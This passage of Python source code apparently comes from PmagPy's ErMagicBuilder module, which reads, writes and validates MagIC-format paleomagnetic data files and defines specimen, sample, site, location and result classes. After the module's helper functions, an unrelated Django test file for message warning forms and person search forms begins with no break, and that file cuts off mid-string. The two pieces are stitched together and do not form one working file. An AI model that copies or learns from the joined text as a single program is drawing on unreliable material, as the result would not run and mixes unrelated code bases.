add it to the site/sample object as site/sample.age_data. """ # use filename if provided, otherwise find er_ages.txt in WD if not filename: short_filename = 'er_ages.txt' magic_file = os.path.join(self.WD, short_filename) else: magic_file = filename if not os.path.isfile(magic_file): print('-W- Could not find {}'.format(magic_file)) return False data_dict, header, file_type = self.read_magic_file(magic_file, 'by_line_number') # if provided file is not an age_file, # try to read it in as whatever type of file it actually is if file_type != 'er_ages': item_type = file_type.split('_')[1][:-1] self.get_magic_info(item_type, filename=filename, sort_by_file_type=True) return file_type # if it is an age file, # determine level for each age and assign it to the appropriate pmag object for item_dict in list(data_dict.values()): item_type = None for dtype in ['specimen', 'sample', 'site', 'location']: header_name = 'er_' + dtype + '_name' if header_name in list(item_dict.keys()): if item_dict[header_name]: item_type = dtype item_name = item_dict[header_name].strip() break if not item_type: print('-W- You must provide a name for your age') print(' These data:\n{}\n will not be imported'.format(item_dict)) continue items_list = self.data_lists[item_type][0] item = self.find_by_name(item_name, items_list) if not item: ## the following code creates any item in er_ages that does not exist already ## however, we may not WANT that behavior print("""-I- A {} named {} in your age file was not found in the data object: Now initializing {} {}""".format(item_type, item_name, item_type, item_name)) ind = self.ancestry.index(item_type) parent_type = self.ancestry[ind+1] parent_header, parent_constructor = None, None if parent_type: parent_list, parent_class, parent_constructor = self.data_lists[parent_type] parent_header = 'er_' + parent_type + '_name' parent_name = item_dict.get(parent_header, '') parent = self.find_by_name(parent_name, parent_list) # if the parent item doesn't exist, and should, create it if parent_name and not parent: print("""-I- A {} named {} in your age file was not found in the data object: Now initializing {} {}""".format(parent_type, parent_name, parent_type, parent_name)) parent = parent_constructor(parent_name, None) item_constructor = self.data_lists[item_type][2] if not parent: parent_name = None item = item_constructor(item_name, parent_name) # add the age data to the object item.age_data = remove_dict_headers(item_dict) # note that data is available to write self.write_ages = True return file_type def get_results_info(self, filename=None): """ Read pmag_results.txt file. Parse information into dictionaries for each item. Then add it to the item object as object.results_data. """ if not filename: short_filename = "pmag_results.txt" magic_file = os.path.join(self.WD, short_filename) else: magic_file = filename if not os.path.isfile(magic_file): print('-W- Could not find {} in your working directory {}'.format(short_filename, self.WD)) return False # get the data from the pmag_results.txt file data_dict = self.read_magic_file(magic_file, 'by_line_number')[0] def make_items_list(string, search_items_list): names = string.split(':') items = [] for name in names: name = name.strip(' ') item = self.find_by_name(name, search_items_list) if item: items.append(item) return items for num, result in list(data_dict.items()): name, specimens, samples, sites, locations = None, None, None, None, None for key, value in list(result.items()): #print key, ':', value if key == 'er_specimen_names': specimens = make_items_list(value, self.specimens) if key == 'er_sample_names': samples = make_items_list(value, self.samples) if key == 'er_site_names': sites = make_items_list(value, self.sites) if key == 'er_location_names': locations = make_items_list(value, self.locations) if key == 'pmag_result_name': name = value for header_name in ['er_specimen_names', 'er_site_names', 'er_sample_names', 'er_location_names']: if header_name in list(result.keys()): result.pop(header_name) if not name: name = num result_item = self.find_by_name(name, self.results) if not result_item: result_item = Result(name, specimens, samples, sites, locations, result, self.data_model) else: print('-W- Two or more results with name: {} found in your result file.\n Taking only the first.'.format(name)) if result_item and result_item not in self.results: self.results.append(result_item) def read_magic_file(self, path, sort_by_this_name, sort_by_file_type=False): """ read a magic-formatted tab-delimited file. return a dictionary of dictionaries, with this format: {'Z35.5a': {'specimen_weight': '1.000e-03', 'er_citation_names': 'This study', 'specimen_volume': '', 'er_location_name': '', 'er_site_name': 'Z35.', 'er_sample_name': 'Z35.5', 'specimen_class': '', 'er_specimen_name': 'Z35.5a', 'specimen_lithology': '', 'specimen_type': ''}, ....} """ DATA = {} with open(path, 'r') as fin: lines = list(fin.readlines()) first_line = lines[0] if not first_line: return False, None, 'empty_file' if first_line[0] == "s" or first_line[1] == "s": delim = ' ' elif first_line[0] == "t" or first_line[1] == "t": delim = '\t' else: print('-W- error reading ', path) return False, None, 'bad_file' file_type = first_line.strip('\n').split(delim)[1] if sort_by_file_type: item_type = file_type.split('_')[1][:-1] if item_type == 'age': sort_by_this_name = "by_line_number" else: sort_by_this_name = 'er_' + item_type + '_name' line = lines[1] header = line.strip('\n').split(delim) counter = 0 for line in lines[2:]: tmp_data = {} tmp_line = line.strip('\n').split(delim) for i in range(len(header)): if i < len(tmp_line): tmp_data[header[i]] = tmp_line[i].strip() else: tmp_data[header[i]] = "" if sort_by_this_name == "by_line_number": DATA[counter] = tmp_data counter += 1 else: if tmp_data[sort_by_this_name] != "": DATA[tmp_data[sort_by_this_name]] = tmp_data return DATA, header, file_type def write_measurements_file(self): filename = os.path.join(self.WD, 'magic_measurements.txt') magic_outfile = open(filename, 'w') measurement_headers = self.headers['measurement']['er'][0] measurement_headers[:0] = ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'magic_experiment_name', 'measurement_number'] specimen_names = self.make_name_list(self.specimens) meas_strings = [] for meas in self.measurements: meas_string = [] # if a specimen has been deleted, # do not record any measurements for that specimen if not meas.specimen.name in specimen_names or not meas.specimen.name: continue for header in measurement_headers: if header == 'er_specimen_name': val = self.get_name(meas, 'specimen', 'name') elif header == 'er_sample_name': val = self.get_name(meas, 'specimen', 'sample', 'name') elif header == 'er_site_name': val = self.get_name(meas, 'specimen', 'sample', 'site', 'name') elif header == 'er_location_name': val = self.get_name(meas, 'specimen', 'sample', 'site', 'location', 'name') elif header == 'magic_experiment_name': val = meas.experiment_name elif header == 'measurement_number': val = meas.meas_number else: val = meas.er_data.get(header, '') meas_string.append(val) meas_string = '\t'.join(meas_string) meas_strings.append(meas_string) # write data to file magic_outfile.write('tab\tmagic_measurements\n') header_string = '\t'.join(measurement_headers) magic_outfile.write(header_string + '\n') for string in meas_strings: magic_outfile.write(string + '\n') magic_outfile.close() return True ### Methods for writing data ### def write_files(self): """ write all data out into er_* and pmag_* files as appropriate """ warnings = self.validate_data() print('-I- Writing all saved data to files') if self.measurements: self.write_measurements_file() for dtype in ['specimen', 'sample', 'site']: if self.data_lists[dtype][0]: do_pmag = dtype in self.incl_pmag_data self.write_magic_file(dtype, do_er=True, do_pmag=do_pmag) if not do_pmag: pmag_file = os.path.join(self.WD, 'pmag_' + dtype + 's.txt') if os.path.isfile(pmag_file): os.remove(pmag_file) if self.locations: self.write_magic_file('location', do_er=True, do_pmag=False) self.write_age_file() if self.results: self.write_result_file() if warnings: print('-W- ' + str(warnings)) return False, warnings return True, None def write_magic_file(self, dtype, do_er=True, do_pmag=True): if dtype == 'location': do_pmag = False # make header add_headers = [] self.ancestry_ind = self.ancestry.index(dtype) for i in range(self.ancestry_ind, len(self.ancestry) - 1): add_headers.append('er_' + self.ancestry[i] + "_name") er_actual_headers = sorted(self.headers[dtype]['er'][0]) pmag_actual_headers = sorted(self.headers[dtype]['pmag'][0]) # clean up pmag header: write pmag method code header without '++' for pmag_head in pmag_actual_headers[:]: if '++' in pmag_head: pmag_actual_headers.remove(pmag_head) pmag_actual_headers.append(pmag_head[:-2]) er_full_headers = add_headers[:] er_full_headers.extend(er_actual_headers) pmag_full_headers = add_headers[:] pmag_full_headers.extend(pmag_actual_headers) er_start = 'er_' + dtype + 's' pmag_start = 'pmag_' + dtype + 's' er_strings = [] pmag_strings = [] # get sorted list of all relevant items items_list = sorted(self.data_lists[dtype][0], key=lambda item: item.name) # fill in location begin/end lat/lon if those values are not present if dtype == 'location': d = self.get_min_max_lat_lon(items_list) for item in items_list[:]: for header in ['location_begin_lat', 'location_begin_lon', 'location_end_lat', 'location_end_lon']: if not item.er_data[header]: item.er_data[header] = d[item.name][header] # go through items and collect necessary data for item in items_list[:]: # get an item's ancestors ancestors = self.get_ancestors(item) er_string = [] pmag_string = [] # if item has no pmag_data at all, do not write it to pmag_file do_this_pmag = True temp_pmag_data = list(item.pmag_data.values()) if 'This study' in temp_pmag_data: temp_pmag_data.remove('This study') if not any(temp_pmag_data): do_this_pmag = False # compile er data if do_er: er_string.append(item.name) for ancestor in ancestors: er_string.append(ancestor) for key in er_actual_headers: try: add_string = str(item.er_data[key]) except KeyError: add_string = '' item.er_data[key] = '' if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' er_string.append(add_string) er_string = '\t'.join(er_string) er_strings.append(er_string) # if we are writing a pmag file AND this particular item has pmag data, # compile this item's pmag data if do_pmag and do_this_pmag: pmag_string.append(item.name) for ancestor in ancestors: pmag_string.append(ancestor) # get an item's descendents (only req'd for pmag files) descendents = self.get_descendents(item) more_headers = [] more_strings = [] # add in appropriate descendents possible_types = ['specimen', 'sample', 'site'] for num, descendent_list in enumerate(descendents): item_string = get_item_string(descendent_list) more_strings.append(item_string) more_headers.append('er_' + possible_types[num] + '_names') ind = len(pmag_string) pmag_string.extend(more_strings) if more_headers == pmag_full_headers[ind:ind+len(more_strings)]: pass else: pmag_full_headers[ind:ind] = more_headers # write out all needed values for key in pmag_actual_headers: try: add_string = item.pmag_data[key] except KeyError: add_string = '' item.pmag_data[key] = '' # add default values if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' pmag_string.append(str(add_string)) pmag_string = '\t'.join(pmag_string) pmag_strings.append(pmag_string) # write actual pmag file with all collected data pmag_header_string = '\t'.join(pmag_full_headers) pmag_outfile = '' if do_pmag: pmag_outfile = open(os.path.join(self.WD, pmag_start + '.txt'), 'w') pmag_outfile.write('tab\t' + pmag_start + '\n') pmag_outfile.write(pmag_header_string + '\n') for string in pmag_strings: pmag_outfile.write(string + '\n') pmag_outfile.close() # write actual er file with all collected data er_header_string = '\t'.join(er_full_headers) er_outfile = '' if do_er: er_outfile = open(os.path.join(self.WD, er_start + '.txt'), 'w') er_outfile.write('tab\t' + er_start + '\n') er_outfile.write(er_header_string + '\n') for string in er_strings: er_outfile.write(string + '\n') er_outfile.close() return er_outfile, pmag_outfile def write_result_file(self): actual_headers = sorted(self.headers['result']['pmag'][0]) add_headers = ['pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'er_location_names'] full_headers = add_headers[:] full_headers.extend(actual_headers) header_string = '\t'.join(full_headers) results = self.data_lists['result'][0] result_strings = [] for result in results: result_string = [] result_string.append(result.name) spec_str = get_item_string(result.specimens) samp_str = get_item_string(result.samples) site_str = get_item_string(result.sites) loc_str = get_item_string(result.locations) strings = [spec_str, samp_str, site_str, loc_str] for string in strings: result_string.append(string) for key in actual_headers: add_string = result.pmag_data[key] if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' result_string.append(str(add_string)) result_string = '\t'.join(result_string) result_strings.append(result_string) outfile = open(os.path.join(self.WD, 'pmag_results.txt'), 'w') outfile.write('tab\tpmag_results\n') outfile.write(header_string + '\n') for string in result_strings: outfile.write(string + '\n') outfile.close() return outfile def write_age_file(self): """ Write er_ages.txt based on updated ErMagicBuilder data object """ if not self.write_ages: print('-I- No age data available to write') return first_headers = self.first_age_headers actual_headers = sorted(self.headers['age']['er'][0]) for header in first_headers: if header in actual_headers: actual_headers.remove(header) add_headers = ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name'] actual_headers[:0] = first_headers full_headers = add_headers[:] full_headers.extend(actual_headers) header_string = '\t'.join(full_headers) ages = [] for dtype in ['specimen', 'sample', 'site', 'location']: ages_list = sorted(self.data_lists[dtype][0], key=lambda item: item.name) ages.extend(ages_list) age_strings = [] for age in ages: ind = self.ancestry.index(age.dtype) ancestors = ['' for num in range(len(self.ancestry) - (ind+2))] data_found = False string = '' if age.dtype == 'specimen': string += age.name + '\t' elif age.dtype == 'sample': string += '\t' + age.name + '\t' elif age.dtype == 'site': string += '\t\t' + age.name + '\t' elif age.dtype == 'location': string += '\t\t\t' + age.name + '\t' parent = age.get_parent() grandparent = None if parent: ancestors[0] = parent.name grandparent = parent.get_parent() if grandparent: ancestors[1] = grandparent.name greatgrandparent = grandparent.get_parent() if greatgrandparent: ancestors[2] = greatgrandparent.name for ancestor in ancestors: string += ancestor + '\t' for key in actual_headers: try: add_string = age.age_data[key] except KeyError: add_string = '' age.age_data[key] = '' if add_string and not key == 'er_citation_names': data_found = True if key == 'er_citation_names' and not add_string.strip('\t'): add_string = 'This study' string += add_string + '\t' # prevent extra '' at the end of age string if string.endswith('\t'): string = string[:-1] # only write ages to file if there is data provided if data_found: age_strings.append(string) outfile = open(os.path.join(self.WD, 'er_ages.txt'), 'w') outfile.write('tab\ter_ages\n') outfile.write(header_string + '\n') if not age_strings: outfile.close() os.remove(os.path.join(self.WD, 'er_ages.txt')) return False for string in age_strings: outfile.write(string + '\n') outfile.close() return outfile ## Validations ## def validate_data(self): """ Validate specimen, sample, site, and location data. """ warnings = {} spec_warnings, samp_warnings, site_warnings, loc_warnings = {}, {}, {}, {} if self.specimens: spec_warnings = self.validate_items(self.specimens, 'specimen') if self.samples: samp_warnings = self.validate_items(self.samples, 'sample') if self.sites: site_warnings = self.validate_items(self.sites, 'site') if self.locations: loc_warnings = self.validate_items(self.locations, 'location') return spec_warnings, samp_warnings, site_warnings, loc_warnings def validate_items(self, item_list, item_type): """ Go through a list Pmag_objects and check for: parent errors, children errors, type errors. Return a dictionary of exceptions in this format: {sample1: {'parent': [warning1, warning2, warning3], 'child': [warning1, warning2]}, sample2: {'child': [warning1], 'type': [warning1, warning2]}, ...} """ def append_or_create_dict_item(warning_type, dictionary, key, value): """ Add to dictionary with this format: {key1: {warning_type1: [value1, value2], warning_type2: [value1]}, ...} """ if not value: return try: name = key.name except AttributeError: name = key if not name in dictionary: dictionary[name] = {} if not warning_type in dictionary[name]: dictionary[name][warning_type] = [] for v in value: dictionary[name][warning_type].append(v) def check_item_type(item, item_type):#, warnings=None): """ Make sure that item has appropriate type, and is in the data object. """ warnings = [] item_list, item_class, item_constructor = self.data_lists[item_type] if not isinstance(item, item_class): warnings.append(PmagException('wrong type')) if item not in item_list: warnings.append(PmagException('not in data object')) return warnings def check_item_for_parent(item, item_type, parent_type): """ Make sure that item has a parent of the correct type """ if not parent_type: return [] if not isinstance(item, Pmag_object): return [] warnings = [] parent = item.get_parent() parent_list, parent_class, parent_constructor = self.data_lists[parent_type] if not parent or not parent.name: warnings.append(PmagException('missing parent')) return warnings if not isinstance(parent, parent_class): warnings.append(PmagException('invalid parent type', parent)) if not parent in parent_list: warnings.append(PmagException('parent not in data object', parent)) return warnings def check_item_for_children(item, child_type): """ Make sure that any children are of the correct type, and are in the data object """ if not child_type: return [] warnings = [] children = item.children child_list, child_class, child_constructor = self.data_lists[child_type] for child in children: if not isinstance(child, child_class): warnings.append(PmagException('child has wrong type', child)) if not child in child_list: warnings.append(PmagException('child not in data object', child)) return warnings warnings = {} type_ind = self.ancestry.index(item_type) parent_type = self.ancestry[type_ind+1] child_type = self.ancestry[type_ind-1] for item in item_list: #warnings[item] = [] type_warnings = check_item_type(item, item_type) append_or_create_dict_item('type', warnings, item, type_warnings) parent_warnings = check_item_for_parent(item, item_type, parent_type) append_or_create_dict_item('parent', warnings, item, parent_warnings) child_warnings = check_item_for_children(item, child_type) append_or_create_dict_item('children', warnings, item, child_warnings) return warnings def validate_results(self, result_list): """ """ def in_data_obj(lst, dtype): missing = [] for item in lst: if item not in self.data_lists[dtype][0]: try: item_name = item.name except AttributeError: item_name = str(item) missing.append(item_name) return missing def add_result_dict_item(dictionary, key, value): if not value: return elif key not in dictionary: dictionary[key] = value warnings = {} for result in result_list: res_warnings = {} if result.specimens: add_result_dict_item(res_warnings, 'specimen', in_data_obj(result.specimens, 'specimen')) if result.samples: add_result_dict_item(res_warnings, 'sample', in_data_obj(result.samples, 'sample')) if result.sites: add_result_dict_item(res_warnings, 'site', in_data_obj(result.sites, 'site')) if result.locations: add_result_dict_item(res_warnings, 'location', in_data_obj(result.locations, 'location')) if res_warnings: warnings[result.name] = res_warnings return warnings def validate_measurements(self, meas_list): meas_warnings = {} for meas in meas_list: warnings = [] if not meas.specimen: warnings.append(PmagException('missing parent')) elif not meas.specimen in self.specimens: warnings.append(PmagException('parent not in data object', meas.specimen)) if warnings: meas_warnings[meas] = {} meas_warnings[meas]['parent'] = warnings return meas_warnings # helper methods def get_ancestors(self, pmag_object): ancestors = [] ancestors = ['' for num in range(len(self.ancestry) - (self.ancestry_ind+2))] parent = self.ancestry[self.ancestry_ind+1] parent = pmag_object.get_parent() grandparent, greatgrandparent = None, None if parent: ancestors[0] = parent.name grandparent = parent.get_parent() if grandparent: ancestors[1] = grandparent.name greatgrandparent = grandparent.get_parent() if greatgrandparent: ancestors[2] = greatgrandparent.name return ancestors def get_descendents(self, pmag_object): descendents = self.ancestry[1:self.ancestry_ind] descendents = ['' for num in range(len(descendents))] children = pmag_object.children if children: descendents[-1] = children grandchildren = [] for child in pmag_object.children: if pmag_object.children: grandchildren.extend(child.children) if grandchildren: descendents[-2] = grandchildren greatgrandchildren = [] for gchild in grandchildren: if gchild.children: greatgrandchildren.extend(gchild.children) if greatgrandchildren: descendents[-3] = greatgrandchildren return descendents def get_min_max_lat_lon(self, locations): """ Take a list of locations and return a dictionary with: location1: 'location_begin_lat', 'location_begin_lon', 'location_end_lat', 'location_end_lon'. and so on. """ d = {} for location in locations: sites = location.sites max_lat, min_lat = '', '' max_lon, min_lon = '', '' if not any(sites): d[location.name] = {'location_begin_lat': min_lat, 'location_begin_lon': min_lon, 'location_end_lat': max_lat, 'location_end_lon': max_lon} #return d continue lats, lons = [], [] # try to fill in min/max latitudes/longitudes from sites for site in sites: if site.er_data['site_lon']: lons.append(site.er_data['site_lon']) if site.er_data['site_lat']: lats.append(site.er_data['site_lat']) if lats: lats = [float(lat) for lat in lats] max_lat = max(lats) min_lat = min(lats) if lons: lons = [float(lon) for lon in lons] max_lon = max(lons) min_lon = min(lons) d[location.name] = {'location_begin_lat': min_lat, 'location_begin_lon': min_lon, 'location_end_lat': max_lat, 'location_end_lon': max_lon} return d class PmagException(Exception): def __init__(self, message, obj=None): super(PmagException, self).__init__(message) self.obj = obj # measurements can be uniquely identified by experiment name + measurement # # location, site, sample, and specimen names are ALL required headers for each measurement class Measurement(object): def __init__(self, experiment_name, meas_number, specimen=None, data=None): self.experiment_name = experiment_name self.meas_number = meas_number self.name = experiment_name.strip() + '_' + str(meas_number) self.specimen = specimen self.er_data = remove_dict_headers(data) self.pmag_data = {} def __repr__(self): return 'Measurement: ' + self.name class Pmag_object(object): """ Base class for Specimens, Samples, Sites, etc. """ def __init__(self, name, dtype, data_model=None, er_data=None, pmag_data=None, results_data=None):#, headers={}): if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.name = name.strip() # names shouldn't start or end with a space! self.dtype = dtype er_name = 'er_' + dtype + 's' pmag_name = 'pmag_' + dtype + 's' self.pmag_reqd_headers, self.pmag_optional_headers = self.get_headers(pmag_name) self.er_reqd_headers, self.er_optional_headers = self.get_headers(er_name) self.results_reqd_headers, self.results_optional_headers = self.get_headers('pmag_results') er_reqd_data = {key: '' for key in self.er_reqd_headers} pmag_reqd_data = {key: '' for key in self.pmag_reqd_headers} results_reqd_data = {key: '' for key in self.results_reqd_headers} if er_data: self.er_data = combine_dicts(er_data, er_reqd_data) else: self.er_data = er_reqd_data if pmag_data: self.pmag_data = combine_dicts(pmag_data, pmag_reqd_data) else: self.pmag_data = pmag_reqd_data if results_data: self.results_data = combine_dicts(results_data, results_reqd_data) else: self.results_data = None if dtype in ('specimen', 'sample', 'site', 'location'): self.age_reqd_headers, self.age_optional_headers = self.get_headers('er_ages') self.age_data = {key: '' for key in self.age_reqd_headers} remove_dict_headers(self.age_data) # take out unneeded headers remove_dict_headers(self.er_data) remove_dict_headers(self.pmag_data) # make sure all longitudes/declinations/azimuths are in 0-360 self.er_data = pmag.adjust_all_to_360(self.er_data) def __repr__(self): return self.dtype + ": " + self.name def get_headers(self, data_type): """ If data model not present, get data model from Earthref site or PmagPy directory. Return a list of required headers and optional headers for given data type. """ try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def update_data(self, er_data=None, pmag_data=None, replace_data=False): if er_data: if replace_data: self.er_data = er_data else: self.er_data = combine_dicts(er_data, self.er_data) if er_data: pmag.adjust_all_to_360(self.er_data) if pmag_data: if replace_data: self.pmag_data = pmag_data else: self.pmag_data = combine_dicts(pmag_data, self.pmag_data) if pmag_data: pmag.adjust_all_to_360(self.pmag_data) def add_child(self, child): if 'children' in dir(self): self.children.append(child) class Specimen(Pmag_object): """ Specimen level object """ def __init__(self, name, sample, data_model=None, er_data=None, pmag_data=None): dtype = 'specimen' super(Specimen, self).__init__(name, dtype, data_model, er_data, pmag_data) self.sample = sample or "" self.children = [] self.propagate_data() def get_parent(self): return self.sample def set_parent(self, new_samp): """ Set self.sample as either an empty string, or with a new Sample. """ self.sample = new_samp if new_samp: if not isinstance(new_samp, Sample): raise Exception self.propagate_data() return new_samp def change_specimen(self, new_name, new_sample=None, er_data=None, pmag_data=None, replace_data=False): self.name = new_name if new_sample: if self.sample: self.sample.specimens.remove(self) self.sample = new_sample self.sample.specimens.append(self) self.update_data(er_data, pmag_data, replace_data) self.propagate_data() def propagate_data(self): if not self.sample: return for dtype in ['class', 'lithology', 'type']: if 'specimen_' + dtype in list(self.er_data.keys()): if (not self.er_data['specimen_' + dtype]) or (self.er_data['specimen_' + dtype].lower() == "not specified"): if self.sample.er_data['sample_' + dtype]: value = self.sample.er_data['sample_' + dtype] self.er_data['specimen_' + dtype] = value class Sample(Pmag_object): """ Sample level object """ def __init__(self, name, site, data_model=None, er_data=None, pmag_data=None): dtype = 'sample' super(Sample, self).__init__(name, dtype, data_model, er_data, pmag_data) self.specimens = [] self.children = self.specimens self.site = site or "" self.propagate_data() def get_parent(self): return self.site def set_parent(self, new_site): """ Set self.site as either an empty string, or with a new Site. """ if new_site: if not isinstance(new_site, Site): raise Exception self.site = new_site self.propagate_data() return new_site def change_sample(self, new_name, new_site=None, er_data=None, pmag_data=None, replace_data=False): self.name = new_name if new_site: if self.site: self.site.samples.remove(self) self.site = new_site self.site.samples.append(self) self.update_data(er_data, pmag_data, replace_data) self.propagate_data() def propagate_data(self): if not self.site: return for dtype in ['class', 'lithology', 'type']: samp_key = 'sample_' + dtype site_key = 'site_' + dtype if samp_key in list(self.er_data.keys()): if (not self.er_data[samp_key]) or (self.er_data[samp_key].lower() == "not specified"): if site_key not in self.site.er_data: self.site.er_data[site_key] = '' elif self.site.er_data[site_key]: value = self.site.er_data[site_key] self.er_data[samp_key] = value for dtype in ['lat', 'lon']: samp_key = 'sample_' + dtype site_key = 'site_' + dtype if samp_key in list(self.er_data.keys()): if not self.er_data[samp_key]: if site_key in list(self.site.er_data.keys()): self.er_data[samp_key] = self.site.er_data[site_key] class Site(Pmag_object): """ Site level object """ def __init__(self, name, location, data_model=None, er_data=None, pmag_data=None): dtype = 'site' super(Site, self).__init__(name, dtype, data_model, er_data, pmag_data) self.samples = [] self.children = self.samples self.location = location or "" def get_parent(self): return self.location def set_parent(self, new_loc): if new_loc: if not isinstance(new_loc, Location): raise Exception self.location = new_loc return new_loc def change_site(self, new_name, new_location=None, new_er_data=None, new_pmag_data=None, replace_data=False): """ Update a site's name, location, er_data, and pmag_data. By default, new data will be added in to pre-existing data, overwriting existing values. If replace_data is True, the new data dictionary will simply take the place of the existing dict. """ self.name = new_name if new_location: self.location = new_location self.update_data(new_er_data, new_pmag_data, replace_data) class Location(Pmag_object): """ Location level object """ def __init__(self, name, parent=None, data_model=None, er_data=None, pmag_data=None): dtype = 'location' super(Location, self).__init__(name, dtype, data_model, er_data, pmag_data) #def __init__(self, name, dtype, data_model=None, er_data=None, pmag_data=None, results_data=None):#, headers={}): self.sites = [] self.children = self.sites def get_parent(self): return False def set_parent(self, parent=None): return False def change_location(self, new_name, new_er_data=None, new_pmag_data=None, replace_data=False): self.name = new_name #if new_er_data: # self.er_data = combine_dicts(new_er_data, self.er_data) self.update_data(new_er_data, new_pmag_data, replace_data) class Result(object): def __init__(self, name, specimens='', samples='', sites='', locations='', pmag_data=None, data_model=None): if not data_model: self.data_model = validate_upload.get_data_model() else: self.data_model = data_model self.name = name.strip() # names shouldn't start or end with a space! self.specimens = specimens self.samples = samples self.sites = sites self.locations = locations self.er_data = {} pmag_name = 'pmag_results' self.pmag_reqd_headers, self.pmag_optional_headers = self.get_headers(pmag_name) #self.results_reqd_headers, self.results_optional_headers = self.get_headers('pmag_results') pmag_reqd_data = {key: '' for key in self.pmag_reqd_headers} #results_reqd_data = {key: '' for key in self.results_reqd_headers} if pmag_data: self.pmag_data = combine_dicts(pmag_data, pmag_reqd_data) else: self.pmag_data = pmag_reqd_data # make sure all longitudes/declinations/azimuths are in 0-360 self.pmag_data = pmag.adjust_all_to_360(self.pmag_data) def __repr__(self): if self.pmag_data: descr = self.pmag_data.get('result_description') else: descr = '' return 'Result: {}, {}'.format(self.name, descr) def get_headers(self, data_type): """ If data model not present, get data model from Earthref site or PmagPy directory. Return a list of required headers and optional headers for given data type. """ try: data_dict = self.data_model[data_type] except KeyError: return [], [] reqd_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] == 'Required']) optional_headers = sorted([header for header in list(data_dict.keys()) if data_dict[header]['data_status'] != 'Required']) return reqd_headers, optional_headers def change_result(self, new_name, new_pmag_data=None, specs=None, samps=None, sites=None, locs=None, replace_data=False): self.name = new_name if new_pmag_data: self.pmag_data = combine_dicts(new_pmag_data, self.pmag_data) self.specimens = specs self.samples = samps self.sites = sites self.locations = locs # make sure all longitudes/declinations/azimuths are in 0-360 self.pmag_data = pmag.adjust_all_to_360(self.pmag_data) if __name__ == '__main__': wd = pmag.get_named_arg('-WD', default_val=os.getcwd()) builder = ErMagicBuilder(wd) builder.get_data() # Random helper methods that MIGHT belong in pmag.py def get_item_string(items_list): """ take in a list of pmag_objects return a colon-delimited list of the findable names """ if not items_list: return '' string_list = [] for item in items_list: try: name = item.name string_list.append(name) except AttributeError: pass return ":".join(string_list) def put_list_value_first(lst, first_value): if first_value in lst: lst.remove(first_value) lst[:0] = [first_value] def remove_dict_headers(data_dict): for header in ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'magic_experiment_name', 'measurement_number']: if header in list(data_dict.keys()): data_dict.pop(header) return data_dict def remove_list_headers(data_list): for header in ['er_specimen_name', 'er_sample_name', 'er_site_name', 'er_location_name', 'pmag_result_name', 'er_specimen_names', 'er_sample_names', 'er_site_names', 'magic_experiment_name', 'measurement_number']: if header in data_list: data_list.remove(header) return data_list def combine_dicts(new_dict, old_dict): """ returns a dictionary with all key, value pairs from new_dict. also returns key, value pairs from old_dict, if that key does not exist in new_dict. if a key is present in both new_dict and old_dict, the new_dict value will take precedence. """ old_data_keys = list(old_dict.keys()) new_data_keys = list(new_dict.keys()) all_keys = set(old_data_keys).union(new_data_keys) combined_data_dict = {} for k in all_keys: try: combined_data_dict[k] = new_dict[k] except KeyError: combined_data_dict[k] = old_dict[k] return combined_data_dict from __future__ import absolute_import, unicode_literals from datetime import timedelta from django.core.urlresolvers import reverse from django.test import TestCase from django.utils import timezone from testapp.models import Person, Message class FormsTest(TestCase): def test_warningsform(self): person = Person.objects.create() emailaddress = person.emailaddress_set.create() self.assertEqual( self.client.get(person.urls['message']).status_code, 200) self.assertEqual( self.client.post(person.urls['message']).status_code, 200) response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': '', }) self.assertRedirects(response, person.urls['detail']) self.assertEqual(Message.objects.count(), 1) response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': ' ', }) self.assertEqual(response.status_code, 200) self.assertContains(response, 'Please review the following warnings:') response = self.client.post(person.urls['message'], { 'sent_to': emailaddress.pk, 'message': ' hello ', 'ignore_warnings': 1, }) self.assertRedirects(response, person.urls['detail']) self.assertEqual(Message.objects.count(), 2) def test_searchform(self): date = timezone.now().replace(year=2012, month=10, day=1) for i in range(100): Person.objects.create( given_name='Given %s' % i, family_name='Family %s' % i, is_active=bool(i % 3), created=date + timedelta(days=i), ) list_url = reverse('testapp_person_list') self.assertContains( self.client.get(list_url), '1 - 5 / 100', ) self.assertContains( self.client.get(list_url + '?query=42'), '1 - 1 / 1', ) self.assertContains( self.client.get(list_url + '?query=is:active'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?query=is:inactive'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?query=active:yes'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?query=active:off'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?query=year:2012'), '1 - 5 / 92', ) self.assertContains( self.client.get(list_url + '?query="Given+1"+year%3A2012'), '1 - 5 / 11', ) self.assertContains( self.client.get(list_url + '?query="%2BGiven+1"+year%3A2012'), '1 - 5 / 11', ) self.assertContains( self.client.get(list_url + '?query="-Given+1"+year%3A2012'), '1 - 5 / 81', ) # Form field self.assertContains( self.client.get(list_url + '?is_active=1'), '1 - 5 / 100', ) self.assertContains( self.client.get(list_url + '?is_active=2'), '1 - 5 / 66', ) self.assertContains( self.client.get(list_url + '?is_active=3'), '1 - 5 / 34', ) # Invalid query response = self.client.get(list_url + '?created__year=abc') self.assertEqual(response.status_code, 302) self.assertTrue(response['location'].endswith('?clear=1')) # Mixed quick (only inactive) and form field (only active) # Form field takes precedence self.assertContains( self.client.get(list_url + '?is_active=2&query=is:inactive'), '1 - 5 / 66', ) # Search form persistence self.assertContains( self.client.get(list_url + '?s=1&is_active=3'), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url), '1 - 5 / 34', ) self.assertContains( self.client.get(list_url + '?clear=1'), '1 - 5 / 100', ) # Ordering self.assertContains( self.client.get(list_url), 'Given 0 